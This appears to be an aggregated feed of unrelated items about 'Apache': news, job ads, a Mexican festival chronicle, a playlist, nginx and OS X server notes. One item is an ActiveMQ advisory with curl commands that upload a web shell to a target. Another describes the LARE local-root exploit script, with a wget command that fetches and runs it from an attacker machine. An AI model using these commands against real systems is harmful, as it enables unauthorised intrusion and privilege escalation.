Hello dear friend, happy new year, and thank you for your good content. When I try to start the first option in the XAMPP software, namely Apache, I get the error "Error: Apache shutdown unexpectedly." I would be grateful for your guidance.
          US Air Force Attaches High-Energy Laser to AH-64 Apache Attack Helicopter   
The era of laser weaponry is upon us. The U.S. Army, in partnership with Raytheon, recently unveiled an AH-64 Apache attack helicopter modified with a high-energy laser weapon. The Apache's fully integrated laser system was successfully used to shoot several targets. Raytheon recently released a video of the weapon's system in use […]
          Apache ActiveMQ 5.x Web Shell Upload   
The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. - Source: packetstormsecurity.com
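
For context, a rough sketch of the request pair the advisory describes (hypothetical host, paths and file names; the default admin console port is assumed):

    # upload an arbitrary file via HTTP PUT to the Fileserver web application
    curl -X PUT http://target:8161/fileserver/payload.txt --data-binary @payload.jsp
    # then relocate it with an HTTP MOVE into a location where it can execute
    curl -X MOVE -H 'Destination: file:///opt/activemq/webapps/api/payload.jsp' \
         http://target:8161/fileserver/payload.txt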
          12265 Senior Programmer Analyst - CANADIAN NUCLEAR LABORATORIES (CNL) - Chalk River, ON   
Understanding of server technologies (Internet Information Server, Apache, WebLogic), operating systems (Windows 2008R2/2012, HP-UX, Linux) and server security....
From Indeed - Wed, 07 Jun 2017 17:50:30 GMT - View all Chalk River, ON jobs
          The U.S. Army Attached Laser Cannons To Apache Attack Helicopters   

Long Story Short

Real-life star wars just got a whole lot closer as the U.S. Army revealed it's testing high-energy laser cannons on Apache attack helicopters and military vehicles.

Long Story

From Star Wars to Austin Powers, laser beams have been prophesied as the weapon of the future, but it's 2017 and we're still without frickin' laser beams. What gives?

Sure, we've had lasers on weapons and he...


          PluralSight Course: Understanding Apache Flink   

Apache Flink belongs to the fourth generation of big data processing tools. Given the volume of data generated every day, offline and online, live and otherwise, all of which needs to be processed and analyzed, it is worthwhile to watch this c...


          ApacheBench (portable localized edition)   
The Apache HTTP server benchmarking tool (ab) is a utility bundled with the Apache web server software, designed specifically to measure a web server's performance, particularly that of the Apache HTTP server. Interested readers can download it from the Lvmeng site and try it out.

Download: ApacheBench (portable localized edition)
          “San Juaneando” through the Traditional Festivities of Cócorit, Sonora   

Now that we are touring the south of the state of Sonora, it was a pleasure to attend the celebrations of San Juan's Day in the Comisaría of Cócorit, enjoying the hot, humid microclimate of the Yaqui river as I stepped off the bus in front of the esplanade of the El Conti neighborhood, since I needed some photographs of the saint's image in the church of Espíritu Santo.

But as the church was closed to prevent the vandalism the town has suffered, I went to the house of the Pueblo Mayor (town elder), don Antonio Quiñones, to ask his permission. What a surprise! I received the news that he had passed away years ago and that the current elder, don Aurelio Valencia Valenzuela, was working at the Lomita de Tajimaroa. So I opted to chat with señoras María Yolanda Zazueta Sayas and María José Valenzuela Muñoz while they sat in the shade of a leafy Yucatecan tree, asking them: how did "The Eve of San Juan" go this year?

'It began at 9 at night with the Deer and Pajkola dances in that ramada and the Matachines in the church; "El Torito" was brought out with rockets, and there was plenty of food: guacabaqui, beans with meat, pozole, menudo and flour tortillas.'

'Fifteen Pajkolas came, and a deer dancer with his musicians from the Colonia Militar; 20 Matachines from Tajimaroa; the "Maistro" and singers for the prayers from Vícam Pueblo (a priest and women who sing in old Latin and in the native tongue), and some 30 people from around here. Today, at sunrise and after the prayers, they took the Saint out of the church, crossing over there to the "Porfirito" canal to bathe him in a tub; they used to immerse him in the canal itself, but no longer, since it is now lined with concrete slab.'

Bathed? I asked, puzzled. 'That is what we say, but he was baptized with water by hand in the form of a cross and returned to the altar amid prayers, and afterwards the Matachines danced. By 9 or 10 in the morning it was all over and even the dishes had been washed. The traditions are being lost!' lamented María José.

It was then that I recognized the huge error in my previous chronicle, where I referred to taking out the "Torito de San Juan to bathe it in the canal," which is not correct. They take the image of San Juan Bautista from the altar; the "Torito" is a pyrotechnic figure.

I walked toward the old neighborhood of "La Bomba," once a refuge against Yaqui attacks, along the embankment of the Porfirio Díaz canal, built from 1890 onward, contemplating magnificent landscapes of groves, farm fields, bridges and vernacular Mexican architecture, the legacy of the Porfirian-era Scientific Commission of Sonora.

I strayed a little through the dusty streets of this singular neighborhood, formed between 1922 and 1925 by peaceful Yaquis known as "Mansos," who abandoned it during the armed uprisings of 1926 and 1929 against the federal government; unwilling to settle there as yori (non-Yaqui) farmhands, they emigrated, like the Jewish people, to form their tribe in Torocoba, Guamuchilito and Loma de Guamúchil in 1948.

I crossed a pedestrian bridge and headed for the Ignacio Zaragoza plaza along Hidalgo street, glancing sideways at the Cámara Junior school, threatened with extinction so that this public space can be privatized through the neo-global gentrification of the Cócorit residents who own the Centro district, and at the changed format of the "Feria de San Juan de Cócorit"; and beside a ceiba tree came the reunion with the beautiful former queen of the 2012 Feria de San Juan, Yessenia Carolina Ferreira, now a Psychology graduate candidate writing her professional thesis and hoping to work with special-needs children in Ciudad Obregón.

For her Cócorit beauty I posed her in different settings of the fair: the mechanical rides set up on Yáñez street, much enjoyed by the children, with parked cars blocking access to the atrium of the parish of Nuestra Señora de Guadalupe; along the sidewalk of the plaza, some twenty stalls selling all kinds of food, reaching to the wall of the sports court; and along the main walkway to the modern kiosk, costume-jewelry stands run by the Toki group.

In the garden, over the roots of a ceiba, the exhibition of landscape paintings and deer dancers by Francisco Ayón Tolano, veteran of Cajeme art, assisted by his wife Dolores Báez; in front of the trunk of the "Espíritu Santo de Cócorit," the wood carver Francisco showing his craftwork and an Apache wigwam dwelling, reminding me of the incursions of Geronimo and Mangas Coloradas into the state.

For lack of information, little could be seen of the yori Catholic pilgrimage, with its different, modernized image of San Juan Bautista, carried out by father Raymundo Mesa, acolytes of the parish of Nuestra Señora de Guadalupe, queen Teresita de Jesús and a sparse Catholic flock. By the time we noticed it, they were praying on the bank of the "Porfirito" canal, continuing to the Juárez street bridge, crossing it to Argentina street, turning in front of the Comisaría and ending in front of the atrium, unable to enter the church because a wedding mass was under way; the Yaqui Matachines never appeared, having returned to their town of Tajimaroa.

Erratum: in my last chronicle I suggested that this Catholic pilgrimage was meant to be turned into a Mexican folkloric affair. An error: I confused it with the one held in previous years between this parish and the church of Espíritu Santo in the El Conti neighborhood.

In the atrium I was able to chat with her majesty Teresita de Jesús Zavala Méndez, the beautiful queen of the Feria de San Juan de Cócorit 2017, proudly from Cócorit, crowned during the free public dance on the sports court, and a recognized singer of ranchera and Sinaloan banda music who has won first and third places in the regional Inter-CECyTES Cultural Contests in Hermosillo and auditioned for La Voz México 2015.

Using the kiosk as the stage for the Teatro del Pueblo was a wise choice, with performances by the singer Benito Rojas and the groups Entre Danza and Santos Estudio, whose Mexican folkloric and modern choreographies were warmly applauded by some 250-300 people and their families enjoying the show coordinated by Miguel Ortiz.

In the ramada, a traditional kitchen iconic of Yaqui architecture, I savored a tasty sobaquera flour tortilla pulled off the comal by señora Reyna, president of the civil association Cócorit Tradición y Cultura, while machaca-beef and bean burritos were sold to visitors; some of the women remarked on the oddity of so many painted birds and disapproved of the owl on the beautiful facade of the Robinson Bours residence facing the plaza.

What beautiful horses! I exclaimed, admiring the exhibition of equine paintings by the artist Tolstoy Aguilera Guerrero, shown by señora Martha Murguía, manager of the Casa de Adobe, who invited me to taste delicious machaca-beef chimichangas much appreciated by diners at the restaurant Los Chanates. It was a pleasure to learn that she was selected for the "Sonorenses de a 100" program by governor Claudia Pavlovich, whose honorees were sent to Washington.

Before returning to the former Ciudad Cajeme, hundreds of people were arriving to enjoy the Saturday night dance, with music by the band Tropicalísimo Apache.

I am sorry to say that much disunity, apathy and resentment could be seen among the local culture promoters. On one side, the wealthy neo-Cócorit residents pushing for the native festivities to be held away from the plaza and Tichi Muñoz street, and for the street to be remodeled and privatized for cultural promotion aimed at American tourism.

On the other, northern side, the traditionalist natives and long-time residents who want to use their plaza, demanding respect for the native culture and their right to entertainment in keeping with the customs of old Cócorit, along with the conservation, protection and promotion of its tangible and built cultural heritage for the community's benefit. And then there are dozens of the apathetic, who like none of it.

For all the promotional fanfare lavished on the Comisaría of Cócorit for its candidacy as a Pueblo Mágico of Mexico (already rejected by the federal government), none of the following were seen at the Feria de San Juan: governor Claudia Pavlovich with her numerous retinue of officials, press and staff; the Instituto Sonorense de Cultura from Hermosillo; mayor Faustino Félix with his council and bureaucracy; the Municipal Culture Directorate; the universities and technological institutes; and the civil associations, Fundación Cócorit, Centro Cultural Cócorit, the Museo de los Yaquis and the other cultural enterprises that obtain support of thousands of pesos for culture, all abandoning the comisaría and its committee to the detriment of the annual traditional festival of the town of Cócorit. It is not right!

But the snub backfired, since the festival succeeded anyway thanks to the hundreds of people who enjoyed the kermesse in the plaza and the grupera dances.

One also heard the laments of many adults longing for the old Agricultural, Livestock and Industrial Feria de San Juan de Cócorit of the 1960s, with national artists and entertainment, when it was organized by the Cámara Junior de Cócorit, which built the primary school in 1967. Half a century later, its no-longer-active remnants as Cámara Junior endorse the school's demolition and its removal from the plaza, relocating its 300 poor children to a contemptible, impoverished environment of extreme poverty on the agrochemical-laden agricultural periphery of the old town of Cócorit, to the detriment of primary-school-age children. Social discrimination typical of Ciudad Obregón, Sonora, endorsed by the Secretariat of Education and Culture and the Tourism Promotion Commission of the State of Sonora. How dreadful!


The Feria de San Juan de Cócorit 2017


Señora María Yolanda Zazueta Sayas carrying San Juan Bautista on his feast day.

The esplanade known as Conti, a Yaqui religious space.

Church of Espíritu Santo in the El Conti neighborhood, Cócorit.

The "Porfirito" canal with its extraordinary naturalistic landscapes from the Porfiriato. Here San Juan Bautista is bathed.

Her gracious majesty Teresita de Jesús Zavala Méndez, beautiful queen of the Feria de San Juan de Cócorit 2017.

Her majesty Teresita de Jesús Zavala Méndez, beautiful queen of the Feria de San Juan de Cócorit 2017.

Yessenia Carolina Ferreira, beautiful psychologist and queen of the Feria de San Juan de Cócorit 2012.

Yessenia Carolina Ferreira at the modern kiosk in the plaza.

Yessenia Carolina Ferreira appreciating Ayón's art.

The former 2012 queen browsing Francisco's Apache craftwork.

Yessenia Carolina making tortillas in the kitchen of Cócorit Tradición y Cultura, A.C.

Francisco showing his Espíritu Santo de Cócorit carving to Yessenia Carolina.

Francisco Ayón Tolano, veteran of Cajeme art, and his wife Dolores Báez.

Veracruz choreography by Ente Ballet de Cajeme.

A charming dancer with a candle on her head.

Photographs by Francisco Sánchez López. Don't steal them!

Material protected by copyright SEP-509989-78, held by Arq. Francisco Sánchez López. Reproduction of this article and its photographs is prohibited without the written authorization of the author. Say No to Piracy!

Architect, photographer, artist of Magical Realism, ecologist working to protect the whales of the Sea of Cortés, and cultural journalist writing chronicles and art criticism for the Quehacer Cultural supplement of the newspaper El Diario del Yaqui of Ciudad Obregón, Sonora, Mexico.

Virtual magazine: www.arkisanchez.wordpress.com, registered in CONACULTA's Network of Electronic Art and Culture Magazines in 2014. Facebook: Francisco Sanchez; Twitter: @archfcosanchez



          LARE - [L]ocal [A]uto [R]oot [E]xploiter is a Bash Script That Helps You Deploy Local Root Exploits   
[L]ocal [A]uto [R]oot [E]xploiter is a simple bash script that helps you deploy local root exploits from your attacking machine when your victim machine does not have internet connectivity.
The script is useful in scenarios where the victim machine has no internet connection, e.g. while you pivot into internal networks, play CTFs that use a VPN to connect to their closed labs (e.g. hackthebox.gr), or even in the OSCP labs. The script uses local root exploits for Linux kernels 2.6-4.8.
This script is inspired by Nilotpal Biswas's Auto Root Exploit Tool.

Usage:


1 - Attacking a Victim in a Closed Network
You first have to set up the exploit arsenal on the attacking machine and start the apache2 instance using the following command: bash LARE.sh -a or ./LARE.sh -a


Once that is done, you have to copy the script to the victim machine via any means (wget, ftp, curl, etc.) and run the Exploiter locally with the following command: bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
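
For example, a minimal sketch of that transfer step (assuming the attacking machine's IP is 10.10.10.1 and LARE.sh was copied into apache2's default web root; adjust to your setup):

    # on the victim machine, which can reach the attacker but not the internet
    wget http://10.10.10.1/LARE.sh      # fetch the script from the attacker's apache2 instance
    chmod +x LARE.sh                    # make it executable
    ./LARE.sh -l 10.10.10.1             # run in local mode, pulling exploits from the attacker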



2 - Attacking a Victim with Internet Access
In this scenario the script is to be run on the victim's machine; it will fetch the exploits from exploit-db's GitHub repository and use them for exploitation directly. This is the original functionality of the Auto Root Exploit Tool with some fine tuning done. Run the Exploiter with the following command: bash LARE.sh -l or ./LARE.sh -l


Note
The script runs multiple kernel exploits on the machine, which can destabilize the system. It is highly recommended to use it only as a last resort and in a non-production environment.


Download LARE

          The Afternoon Sound Alternative 06-29-2017 with Marco Mangione   
Playlist:

Gramatik- Just Jammin - SB2
Jurassic 5- A Day At The Races - Power In Numbers
various Artists- Stylissimo Dj Illegal - Strickly Bboy Beats
MASAKI YODA- Dont Stop It - Carrying The Future
Incredible Bongo Band- Apache Grandmaster Flash Remix - Bongo Rock
- voicebreak -
The Haggis Horns- Naughty Buddha - Hot Damn
Dj Diles Feat Molina- Punjabi Mc Jayz Beware Of The Boyz - Mixtape
Rahat Fateh Ali Khan Shreya Ghoshal- Singh Is Kinng feat Snoop Dogg - Singh Is Kinng Original Motion Picture Soundtrack
- voicebreak -
Sunidhi Chauhan- Honeymoon Ki Raat - The Dirty Picture Original Motion Picture Soundtrack EP
Jackie V- Om Shanti Om Medley Mix - Om Shanti Om Original Motion Picture Soundtrack
Mika Singh SachinJigar Monali Thakur- Hip Hop Pammi From Ramaiya Vastavaiya - Best Of 2013 Block Buster Hits
Raghav Mathur Shilpa Rao- Ishq Shava - Jab Tak Hai Jaan Original Motion Picture Soundtrack
- voicebreak -
Sonu Nigam Shreya Ghoshal- Zoobi Doobi From 3 Idiots - Best Of Bebo
The Spy From Cairo- Road To Ryhad - Arabadub
Bush Chemists- New Stylee - Raw Raw Dub
- voicebreak -
HIRIE- Dont Take My Ganja - Wandering Soul
Nattali Rize Julian Marley- Natty Rides Again - Natty Rides Again Single
Morgan Heritage- Dream Girl - Avrakedabra
- voicebreak -
Toots The Maytals- Get Up Stand Up - Toots The Maytals Time Tough The Anthology
Charleston Okafor- America - America
CULTURE- Legalization - Payday
10 Ft Ganja Plant- Burning James - Bass Chalice
- voicebreak -
Rico Rodriguez- Africa Vocal Version - Man From Wareika
Nightmares On Wax- You Wish - In A Space Outta Sound
Underground Resistance- The Stangler - Attac Un Autre Monde Est Possible
DJ Dolores- A Espuma Dos Dias - Aparelhagem
- voicebreak -
Balkan Beat Box- Ill Watch Myself - Shout It Out
Aziza A- Sonsuzluk - Kendi Dunyam
Acid Arab- Sayarat 303 - Musique De France
Thunderball- The Road To Benares - Cinescope
- voicebreak -
The Sound Defects- Aint Right - The Iron Horse
Run The Jewels- Thieves - Rtj3
Ohmega Watts- Yo - Pieces Of A Dream Instrumentals Instrumental
- voicebreak -
George Clinton- Summer Swim - TAPOAFOM The Awesome Power Of A Fully Operational Mothership feat Belita Woods


playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/50/playlistDate/2017-06-29
          Measuring nginx's efficiency (8 replies)   
Hello,

with your help I managed to configure nginx and our website can now be
accessed both through Apache and through nginx.

Now, how can I prove to my boss that nginx is more efficient than Apache,
to justify switching to it? How do I measure its performance and compare
it to that of Apache? Which tools would you recommend?
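
One option I am considering (a rough sketch, assuming both servers serve the
same page, Apache on port 80 and nginx on port 8080 of the same host) is
ApacheBench:

    ab -n 10000 -c 100 http://ourserver/          # 10,000 requests, 100 concurrent, against Apache
    ab -n 10000 -c 100 http://ourserver:8080/     # the same load against nginx

and then comparing the requests-per-second, latency and memory figures.
Would that be a fair comparison?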

Thank you in advance!

_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
          Full-Stack Web Developer DevOps Software Engineer Python Agile Trading / Joseph Harry Ltd / New York, NY   
Joseph Harry Ltd/New York, NY

Full-Stack Web Developer (Software Engineer Python Apache Tomcat IIS DevOps ChatOps Microservices CI CD Bamboo BitBucket ClojureScript Docker Chef Jenkins Agile Digital Trading Banking) required by our trading software client in New York City, New York.

You MUST have the following:

Good experience as a full-stack Software Engineer/Developer for web applications; this can be any language including .NET, Java, PHP, C++, Python

HTML 5, CSS 3, JavaScript for Front End development

An interest in learning Python

Web Servers such as IIS, Tomcat or Apache

Agile

The following would be DESIRABLE, not essential:

BitBucket

Microservices or Domain Driven Design (DDD)

ClojureScript

Docker

ChatOps

Contribution to the open-source community- GitHub, Stack Overflow

Continuous integration (Bamboo/Hudson, TeamCity, TFS, MSBuild)

Automated deployment (Chef, Ansible, Octopus)

Configuration management (Puppet, PowerShell DSC)

Role:

Full-Stack Web Developer/Software Engineer required by my trading software client in New York City, New York. You will join a small Agile team of five developers, spread over the US and Europe, that are extending and improving credit and counterparty risk applications. There will be the continuous development of new features in order to incorporate the constant release of financial regulation into the product suite. The suite is web based, built in Python and running on Apache, Tomcat and MySQL. Although this role will be exclusively developing in Python, Python experience is not required. You can have experience in .NET, Java, PHP, C++ or other languages as long as you are happy to work with Python and have web development experience.

In order to incorporate new financial regulation, the team adopts a highly Agile DevOps environment. This results in several releases a day with the use of Bamboo, BitBucket and Confluence for continuous integration, deployment and source control.

The environment is modern and progressive. There will be excellent opportunities to progress in to Lead Developer and Architect roles.

Salary: $100k - $125k + Bonus + Benefits

Employment Type: Permanent
Work Hours: Full Time
Other Pay Info: $100k - $125k + Bonus + 401K

Apply To Job
          Senior FullStack PHP Developer / ISL Recruitment / Bristol, Somerset, United Kingdom   
ISL Recruitment/Bristol, Somerset, United Kingdom

Senior FullStack PHP Developer

Bristol; up to £35,000 + Flexible working

ISL Recruitment is working with a very successful digital agency with a global presence. They have very cool offices in central Bristol and offer one of the best benefit packages in Bristol!

My client is looking to bring on board a Senior Full-Stack PHP Developer to join a team of 2 developers. This is a fast-paced environment, and you will have the opportunity to learn the latest tech on the market.

As the Full-stack Senior PHP Developer you will be experienced with:

*Object-oriented PHP

*MySQL

*HTML/CSS

*JavaScript (jQuery)

*Good knowledge of Twig (or similar template engine)

*LESS/SASS

*GIT

*Experience of developing sites with WordPress (and other open-source Content Management Systems)

*Experience of Apache/Nginx and Linux server administration

You will be self-motivated and personable as there will be some client interaction, naturally you will also be very organised. You will also be able to accurately estimate project timeframes.

In addition to the above tech if you have any experience with the below this will be beneficial, if not you will have the opportunity to learn!

*Umbraco

*SharePoint

*SEO

*PSR-2 coding style

*MVC design pattern

My client are offering a salary of £30,000 - £35,000 and the benefits include flexible working hours, pension, health and well being incentives, cycle to work, interest free tech loans to name a few!

If you like the sound of this then please get in touch today! Roxy Grey (see below)

Senior FullStack PHP Developer

Bristol; up to £35,000 + Flexible working

ISL (Incite Solutions Ltd) is acting as an Employment Agency in relation to this vacancy.

Employment Type: Permanent

Pay: 30,000 to 35,000 GBP (British Pound)
Pay Period: Annual

Apply To Job
          PHP Web Developer - PHP / Lynx Recruitment Ltd / Skelmersdale, Lancashire, United Kingdom   
Lynx Recruitment Ltd/Skelmersdale, Lancashire, United Kingdom

PHP Web Developer - PHP - Skelmersdale - £25,000

I am looking for a Web Developer for a facilities services company I am working with in Lancashire: one of the UK's leading providers of essential workplace products and services for small businesses. They value helpfulness, reliability and innovation within their employee base, and believe in giving everyone the freedom to do what they do best.

Working closely with the digital team, you will use your ability to manage your personal goals as well as achieve team objectives. Ideally the candidate will have at least 1 to 2 years' experience.

Skills -

PHP 5/7 OOP

MySQL Database and SQL syntax

SSH

Apache Webserver

To understand development design patterns

Understand HTML and CSS

Strong numerical skills

Experience with a Linux server environment

Experience with any PHP Frameworks

Composer experience

Responsibilities -

Communication is key: you will establish briefs from internal and external teams.

Deliver web initiatives to a high standard, whilst meeting project deadlines.

Communicate and enforce best practices to ensure the consistent delivery of high quality services and systems.

Ensure projects are tested in different scenarios to achieve fully functioning systems and websites.

Be innovative with ideas to progress the team and company.

Communicate professionally with internal and external stakeholders by telephone, email and face to face, building positive relationships, responding to and progressing issues to a successful conclusion.

Make conscious attempts at improving the internal systems.

Work alongside the team to achieve the company's standards and goals.

If this is something you would be interested in or know someone that would be then please feel free to apply now

Employment Type: Permanent

Apply To Job
          Web Developer - Wimborne - £25k - £35k / Spectrum IT Recruitment (South) Ltd / Wimborne, Dorset, United Kingdom   
Spectrum IT Recruitment (South) Ltd/Wimborne, Dorset, United Kingdom

Web Developer

Wimborne, Dorset

OOP, PHP5+, MySQL, LAMP, HTML, CSS, JavaScript, JQuery

Salary £25,000 - £35,000 plus benefits, training and career progression

My client are a very successful digital design and development agency and due to growth within the business are currently seeking a web developer who is happy to do both hands-on coding and development whilst being proactive on both client and customer related projects.

Working within a team of technically advanced web developers you will help with assisting in client and customer meetings, scoping requirements and help shape projects from requirements capture through to release. You will be familiar with SASS and source control such as GIT. You will also be happy using JavaScript frameworks, integrating PHP and optimising for page speed and SEO.

Key Skills:

HTML

CSS

JavaScript

JQuery

Bootstrap

LESS/SASS

MVC

PHP

MySQL

Apache

Linux/Windows

My client can offer a great working environment with a benefits package which includes regular training and personal development as well as flexible working hours. You'll have the opportunity to input into the business and processes with regular innovation sessions.

Candidates must be able to provide some code examples upon request.

If you would like to be considered for this fantastic opportunity then please send your CV across to me or email (see below)

Employment Type: Permanent

Pay: 25,000 to 35,000 GBP (British Pound)
Pay Period: Annual
Other Pay Info: training and benefits

Apply To Job
          PHP Developer / ARC IT Recruitment / Woking, Surrey, United Kingdom   
ARC IT Recruitment/Woking, Surrey, United Kingdom

PHP Developer, Web Developer

Woking

Up to £40,000 PA DOE

PHP Developer, Web Developer is required for a creative digital agency based in Woking.

This PHP Developer/Web Developer role will see you working with a number of high profile, important clients to input into the development, creation and maintenance of varied projects.

Skills Required -

Proven commercial experience within a PHP development role

Commercial experience using LAMP (Linux, Apache, MySQL, PHP)

Understanding of Scrum or Agile work flow

Experience using PHP framework Laravel

You will be joining a truly exceptional digital agency in this instance. Our client has gained a number of fantastic clients and is looking to expand further.

To apply for this opportunity please send your CV and portfolio to Ellis McWilton at Arc IT Recruitment.

PHP, Developer, JavaScript, LAMP, Laravel, GIT.

Employment Type: Permanent

Pay: 30,000 to 40,000 GBP (British Pound)
Pay Period: Annual
Other Pay Info: Benefits

Apply To Job
          OS X 10.7 Lion and Lion Server Upgrade Notes   

In this post I will share my notes on the upgrade from OS X 10.6 "Snow Leopard" to 10.7 "Lion". This is not meant to be a comprehensive review, but I hope someone can find some benefit in this information. I am an early adopter in most cases and a software lover (fanatic or addict might be a more appropriate term!), so I bit the bullet for this upgrade as soon as I could get it, knowing that I would be in for some trouble here or there. As for my background, I am a technologist, mostly on the management side these days, but I do have a clue; since I am not doing OS X or iOS development and did not have time to read too much about Lion before the release, these notes represent fairly fresh eyes on the product.

Generally, my upgrade from 10.6.8 to 10.7.0 went smoothly and without trouble. Developers of the software I use were on the ball, and had apps ready for Lion either off their sites or in the Apple App Store. Kudos to them and to Apple for all the hard work. Make no mistake, software is truly hard work, and to make things appear easy and to "just work", like Apple often does, requires massive effort. If it looks easy, the guts of it are hard, in the world of software. There are no magic wands, although it might appear that way.

OS X 10.7 Lion

I thought the download would take forever, but it was relatively quick after making the payment in the App Store. I feel the low price is more than fair; generous even, given the value provided. I did two systems: my home system and my work system, paying for those separately. The morning download at about 7AM JST was fast, while the late afternoon download at the office was slower. Either way, it is a 4GB download.

I retrieved the file that had downloaded to the /Applications folder, before I clicked "Install", for safekeeping, and copied it to a USB stick. There is a way to convert a USB to a bootable disk to use for reinstallation, so I will revisit and do that later.

After clicking Install, the time to install was similar to past experiences with OS X upgrades. Breakfast eaten and paper read, I went back to look, and the system had rebooted into a login screen with a nice-looking "textile" background; very attractive. I used my usual account to log in, and after some grinding of gears (caches and such being created I imagine), everything pretty much came up as expected.

After the install and logging in, my first impression was that this release is a definite paradigm shift towards a more iOS like experience on OS X, given features like Launchpad and Mission Control. These take over a bit of the market share for small development houses making utilities to do a similar thing albeit in a more advanced manner. QuickSilver, LaunchBar and Spaces come to mind.

Some apps do conversions the first time you start them, like Mail and maybe Calendar. This takes a while especially if you have a massive amount of data stored.

Spotlight re-indexed after the first reboot, causing a temporary loss of Spotlight search and full-text search within Mail, for example, while the index process grinds away. Spotlight has been glitchy in the past for me, but this time "it just worked."

Lion has a monochrome palette, looking at the mostly-grey icons in Mail, Finder and Safari. Colorful icons are still present in the Launchpad and Mission Control apps. Then there are the iCal and Address Book apps which look out of character, looking like the objects they represent: iCal like a physical calendar complete with a torn paper edge and Address Book looking like an old-fashioned scheduler portfolio. They look good, but a bit out of place when compared with Mail, Finder or Safari.

Mail.app has really matured well with the Lion release, and has sharp-looking grey-on-grey icons. The problem for me is, I like to rely on color as a visual clue for speed while I work. I suppose one way of looking at it is, there are few distractions from the task at hand, and the monochromality of certain apps make it easy to concentrate on the work being done rather than on colorful icons.

Two of the key new-to-Lion features, LaunchPad and Mission Control, are very iOS-like and easy to use. For instance, to get into Mission Control, which lets you administer and move between spaces, you swipe four fingers upward on the trackpad. This is assuming you have one either on a Laptop like a MacBook Pro, or a Magic Trackpad, but I think we are in the middle of a bootstrap to make OS X very much a touch-centric OS.

An example of a really large "who moved my cheese" moment, and whopping big paradigm shift, is the scroll bars or lack thereof. Lion has the ability to allow any app that is programmed to take advantage of it to run full screen. This looks fantastic in apps like Mail, Safari, and even the MarsEdit editor I am using to write this post. Further, the scroll bars do not appear by default a la iPhone and iPad (i.e., iOS), giving a very clean look to Lion apps in general. Despite the relative hysteria over this predictable Apple shift (I mean, how many times have they done it in the past?), I am not finding it to be a problem at all. You just swipe two fingers on the trackpad to scroll, or for the trackpad-deficient, you can nudge the scroll button on your mouse. If you jiggle the trackpad with two fingers, for instance, the scrollbars appear, and you can then drag-scroll as before and always.

The concept of scrolling itself has changed too, and this takes a bit of getting used to. On a tablet or phone, the touch paradigm means you push or pull the objects in the direction of the movement of your fingers, swiping and pinching. However, this is the opposite of what you might be used to, where pulling down on a scroll bar moves content up. With a touch device, this is the opposite, and so it is with OS X Lion. You pull or push the object (document, list, etc) with your fingers on the trackpad.

Safari has a neat visual indicator of download progress, to the right of the address bar.

Suspending with Option-Command-Eject is faster than ever. Where Snow Leopard was taking ages to go silent, Lion goes to sleep immediately. Perhaps this is due to all the various improvements in automatic file saving and caching?

After restarting a program, Lion remembers the exact state of it, and reopens the program how you left it. If you had 10 text files open, it will open them all back up the next time. I can see this might be annoying, but, it is really nice in many cases.

So far, I really like Lion. As I observe more, I will update this post.

Updates 24 July 2011

When you cmd-click a link in Safari, it now does the right thing and opens the tab next to what you were looking at, instead of way, way over in right field. I like it.

If you use Path Finder, note that it messes with Mission Control. I am not sure what I need to do yet, but I had to keep searching for the open Path Finder window in its Windows menu.

The upper-right hand "lozenge" icon is gone, having been replaced by the full screen icon. It was useful to quickly cycle between different views of the icon bar in any given application, if you option-click it. RIP.

The stop light icons in the upper left of any window seem to function the same, but they are smaller and daintier.

Pressing option while clicking a menu still works to bring up hidden options.

A lot of text-to-speech voices were added and are available as optional downloads. Check out the Speech preferences panel.

Updates 3 Aug 2011

Finally, a security basic has been improved, in that you can easily set your mac to lock after screen inactivity or screensaver activity. System Preferences, Security and Privacy, General.

An irritation is, Lion spell-checks everything everywhere automatically, making it a bit difficult to type, sometimes. It is the iOS paradigm for sure. You can toggle this in System Preferences, Language and Text, Text, Correct Spelling Automatically. It requires a restart.

 

OS X 10.7 Lion Server

Luckily, my firm was not making use of too many of the features of Snow Leopard Server, or this upgrade would have been really painful. When I upgraded to Lion Server, a lot of stuff just broke, unfortunately, but more on that below.

When you go to buy Lion Server from the App Store, you are told that both programs need to be purchased, and it is just as easy as the client to install. Xcode and the Lion Server Administration tools are available as separate downloads. When you download Xcode, despite the fact that it is put into /Applications, you still need to find and run the Xcode install program.

You can still use Workgroup Manager and the Server Admin app, but Lion presents the Server app as the primary admin tool. The problem with this is, the Server app is overly simplistic. Whereas Server Admin had many settings, Server.app has only one or two per service, and not all services came through the upgrade unscathed.

My firm was primarily using Open Directory, Apache, Wiki, Mail, MySQL, and some development tools on our Snow Leopard server. Some problems occurred with each:

Open Directory - some user IDs broke and I had to recreate them.

Mail Server - Lion is still using postfix, but the upgrade broke our aliases in /etc/aliases. When I told postfix how to find the aliases file in main.cf, mail started to flow again. That being said, there is nowhere to add virtual domains and so on and so forth, like you could do with Snow Leopard Server.
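
For reference, a minimal sketch of that fix (assuming the stock /etc/aliases location; your paths may differ):

    # point postfix back at the aliases database and rebuild it
    sudo postconf -e 'alias_maps = hash:/etc/aliases'
    sudo newaliases      # regenerate the aliases db
    sudo postfix reload  # pick up the change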

Apache - the virtual hosts settings do not work, and I lost a whole range of websites as a result. Virtual hosting is the most basic thing, so it was a shame that Apple could not get this one right.
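
For what it's worth, this is the kind of stanza that stopped being honored: a generic Apache example with hypothetical names, not Lion-specific syntax:

    <VirtualHost *:80>
        ServerName www.example.com
        DocumentRoot "/Library/WebServer/Sites/example"
    </VirtualHost>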

Wiki - the wiki is now being served out of the PostgreSQL database (user collab, db collab), instead of out of the Collaboration folder. Further, the look has been made generic, so you no longer have the ability to customize each wiki. However, I would say the usability of the wiki went up considerably from an editor standpoint. We still cannot edit the wiki pages using an iPad.
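
Until Apple provides tooling, a rough sketch of a manual backup (lightly tested on my end; assumes local access to the collab database is permitted):

    sudo pg_dump -U collab collab > wiki-backup.sql   # dump the wiki's database
    sudo psql -U collab -d collab -c '\dt'            # sanity check: list the wiki tables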

MySQL - is no more, though I imagine you can install it somehow. Lion Server comes with PostgreSQL rather than MySQL, but there is no GUI for it at all. You are stuck with psql or perhaps Tuples.app.

My feeling is, Apple are aiming Lion Server at the SMB market, and shutting out businesses that really want to push the envelope on Lion Server.

If that is the case, is it not strange to have so many troubles upgrading, or to have no easy way to back up the wiki without hiring a tech to assist?

Updates 3 Aug 2011

